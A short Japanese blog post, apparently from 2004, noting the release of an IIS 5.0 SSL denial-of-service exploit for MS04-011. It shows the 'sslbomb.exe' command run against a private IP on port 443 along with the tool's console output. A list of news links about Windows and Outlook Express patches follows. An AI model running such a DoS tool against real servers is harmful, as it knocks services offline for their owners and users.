そんなアドミソ様を打ち砕くツールも即座にリリース。（微妙にコメントに呼応）

• Microsoft IIS SSL Remote Denial of Service Exploit (MS04-011)

IIS5.0のSSL環境が無かったのですがこんな感じでSSLが使えなくなる模様。

C:\temp>sslbomb.exe 192.168.1.15 443

<*> S21sec Microsoft IIS 5.0 SSL/TLS Remote DoS <*>

 -> Connecting to 192.168.1.15:443... OK
 -> Sending SSL Client Hello... OK
 -> Waiting for SSL Server Hello... OK
 -> Sending bomb... B00M!! B00M!! B00M!! B00M!! B00M!! B00M!!
 ->
 -> OK. If DoS has been worked you will not be able to negotiate
 SSL with 192.168.1.15:443

• ネットワークに接続しているだけで任意のコードを実行可能な脆弱性(INTERNETWatch)
• 任意コードの実行が可能な脆弱性を含むOutlook Express用累積的パッチ(INTERNETWatch)
• Microsoft Jetデータベースエンジンにバッファオーバーランの脆弱性(INTERNETWatch)
• Windowsに複数の危険なセキュリティ・ホール，“超特大”も含まれる(ITpro)
• Outlook Expressに「緊急」のセキュリティ・ホール，すぐにパッチの適用を(ITpro)
• 【今週のSecurity Check】パッチ未公開のセキュリティ・ホールにも対応，最新版「IEを使い続けるための“お勧め”設定」(ITPro)

追記：
イベントID 5000でエラーが残る模様。詳細は未チェック。